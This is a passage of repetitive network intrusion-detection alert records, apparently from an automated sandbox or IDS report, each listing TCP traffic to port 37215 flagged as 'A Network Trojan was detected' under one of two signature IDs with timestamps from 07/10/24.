                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.868107
                  SID:2829579
                  Source Port:46906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346095
                  SID:2829579
                  Source Port:46080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.375610
                  SID:2835222
                  Source Port:43624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.896326
                  SID:2829579
                  Source Port:45422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2829579
                  Source Port:52360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.554378
                  SID:2829579
                  Source Port:41660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2835222
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102240
                  SID:2829579
                  Source Port:34530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680927
                  SID:2829579
                  Source Port:54038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2829579
                  Source Port:51982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2835222
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.525965
                  SID:2829579
                  Source Port:34814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.165176
                  SID:2835222
                  Source Port:57946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2835222
                  Source Port:34774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.191310
                  SID:2835222
                  Source Port:37988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.851732
                  SID:2835222
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2829579
                  Source Port:50378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2835222
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.072343
                  SID:2835222
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.462724
                  SID:2835222
                  Source Port:55444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077860
                  SID:2829579
                  Source Port:59830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2835222
                  Source Port:46496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2829579
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187520
                  SID:2829579
                  Source Port:36340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500020
                  SID:2829579
                  Source Port:42754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2829579
                  Source Port:36958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2829579
                  Source Port:56168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.870791
                  SID:2835222
                  Source Port:40374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.562679
                  SID:2829579
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.600556
                  SID:2829579
                  Source Port:34728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071215
                  SID:2829579
                  Source Port:34132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046551
                  SID:2835222
                  Source Port:33236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.402218
                  SID:2829579
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.093206
                  SID:2829579
                  Source Port:46530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2829579
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2829579
                  Source Port:37260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661744
                  SID:2829579
                  Source Port:60158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879570
                  SID:2829579
                  Source Port:35850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2829579
                  Source Port:40838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.999668
                  SID:2829579
                  Source Port:56876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017711
                  SID:2829579
                  Source Port:44268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.102101
                  SID:2835222
                  Source Port:45004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.565173
                  SID:2835222
                  Source Port:39804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:54624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301370
                  SID:2829579
                  Source Port:35532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2829579
                  Source Port:56954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2829579
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958280
                  SID:2835222
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.079097
                  SID:2829579
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2835222
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.049111
                  SID:2829579
                  Source Port:47772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2829579
                  Source Port:36820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2835222
                  Source Port:41760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.242428
                  SID:2829579
                  Source Port:59054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2829579
                  Source Port:36996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.620224
                  SID:2835222
                  Source Port:56510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.863402
                  SID:2835222
                  Source Port:33642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.349128
                  SID:2829579
                  Source Port:36902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661383
                  SID:2829579
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2835222
                  Source Port:32816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2835222
                  Source Port:34836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514451
                  SID:2829579
                  Source Port:46368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.986778
                  SID:2835222
                  Source Port:47530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2835222
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483552
                  SID:2835222
                  Source Port:50684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777309
                  SID:2829579
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948023
                  SID:2829579
                  Source Port:50360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2829579
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532257
                  SID:2829579
                  Source Port:60000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.883721
                  SID:2829579
                  Source Port:35828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2835222
                  Source Port:58256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841865
                  SID:2829579
                  Source Port:45336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2829579
                  Source Port:44708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.167062
                  SID:2829579
                  Source Port:55224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2835222
                  Source Port:51124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2829579
                  Source Port:49132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2835222
                  Source Port:39876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.677114
                  SID:2829579
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.585181
                  SID:2829579
                  Source Port:56966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404387
                  SID:2835222
                  Source Port:44626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.182068
                  SID:2829579
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2835222
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2829579
                  Source Port:45254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2829579
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.065824
                  SID:2835222
                  Source Port:42064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.401809
                  SID:2835222
                  Source Port:53014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.943122
                  SID:2829579
                  Source Port:33410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2835222
                  Source Port:41922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.584226
                  SID:2835222
                  Source Port:42312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2835222
                  Source Port:38912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507674
                  SID:2829579
                  Source Port:60270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.567021
                  SID:2835222
                  Source Port:53112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.578459
                  SID:2829579
                  Source Port:51028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2829579
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.310661
                  SID:2829579
                  Source Port:59738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.781765
                  SID:2835222
                  Source Port:38450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2835222
                  Source Port:34810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2835222
                  Source Port:35270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395852
                  SID:2835222
                  Source Port:58008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2835222
                  Source Port:54974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.826538
                  SID:2829579
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362991
                  SID:2829579
                  Source Port:47378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2829579
                  Source Port:38202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538369
                  SID:2829579
                  Source Port:39142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.784576
                  SID:2829579
                  Source Port:58320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2829579
                  Source Port:33558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2835222
                  Source Port:49900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2835222
                  Source Port:51532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.382774
                  SID:2835222
                  Source Port:48910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.816832
                  SID:2829579
                  Source Port:59124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2829579
                  Source Port:58984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149844
                  SID:2835222
                  Source Port:52450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2835222
                  Source Port:55198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.288154
                  SID:2835222
                  Source Port:35362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2829579
                  Source Port:58934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286969
                  SID:2835222
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2835222
                  Source Port:46098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.142531
                  SID:2835222
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.063694
                  SID:2829579
                  Source Port:53552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932722
                  SID:2835222
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2829579
                  Source Port:58232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.574545
                  SID:2829579
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2829579
                  Source Port:33016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.933284
                  SID:2835222
                  Source Port:60866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.809234
                  SID:2835222
                  Source Port:41578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2835222
                  Source Port:43300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.642879
                  SID:2829579
                  Source Port:58354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156135
                  SID:2829579
                  Source Port:53350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932017
                  SID:2835222
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720198
                  SID:2829579
                  Source Port:53632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.426359
                  SID:2829579
                  Source Port:47396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2835222
                  Source Port:54890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648108
                  SID:2835222
                  Source Port:34860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.918271
                  SID:2835222
                  Source Port:42268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655825
                  SID:2829579
                  Source Port:56730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.616142
                  SID:2835222
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2835222
                  Source Port:38876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.800438
                  SID:2835222
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021338
                  SID:2835222
                  Source Port:49520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.842727
                  SID:2835222
                  Source Port:55184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2835222
                  Source Port:55762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.183650
                  SID:2835222
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.013020
                  SID:2829579
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2829579
                  Source Port:48388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.870897
                  SID:2829579
                  Source Port:47504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.310661
                  SID:2835222
                  Source Port:59554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.585951
                  SID:2835222
                  Source Port:43818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.859417
                  SID:2835222
                  Source Port:47628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.236926
                  SID:2835222
                  Source Port:55986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.996062
                  SID:2829579
                  Source Port:42782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.446098
                  SID:2829579
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.805311
                  SID:2835222
                  Source Port:52218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.191147
                  SID:2835222
                  Source Port:50200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.953506
                  SID:2829579
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442575
                  SID:2829579
                  Source Port:42192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962280
                  SID:2835222
                  Source Port:43856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2835222
                  Source Port:46436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2829579
                  Source Port:55408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433711
                  SID:2835222
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472198
                  SID:2835222
                  Source Port:33592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2829579
                  Source Port:47494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2829579
                  Source Port:58186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.748241
                  SID:2835222
                  Source Port:55702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:49222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.679594
                  SID:2829579
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.858149
                  SID:2835222
                  Source Port:32780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.496105
                  SID:2835222
                  Source Port:49154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.237677
                  SID:2835222
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004386
                  SID:2829579
                  Source Port:51894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:54952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734254
                  SID:2829579
                  Source Port:56478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2829579
                  Source Port:34400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.687075
                  SID:2829579
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.761554
                  SID:2835222
                  Source Port:55150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078859
                  SID:2829579
                  Source Port:35126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926314
                  SID:2829579
                  Source Port:56864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.799288
                  SID:2835222
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.630762
                  SID:2835222
                  Source Port:56088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2835222
                  Source Port:52232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2835222
                  Source Port:43496
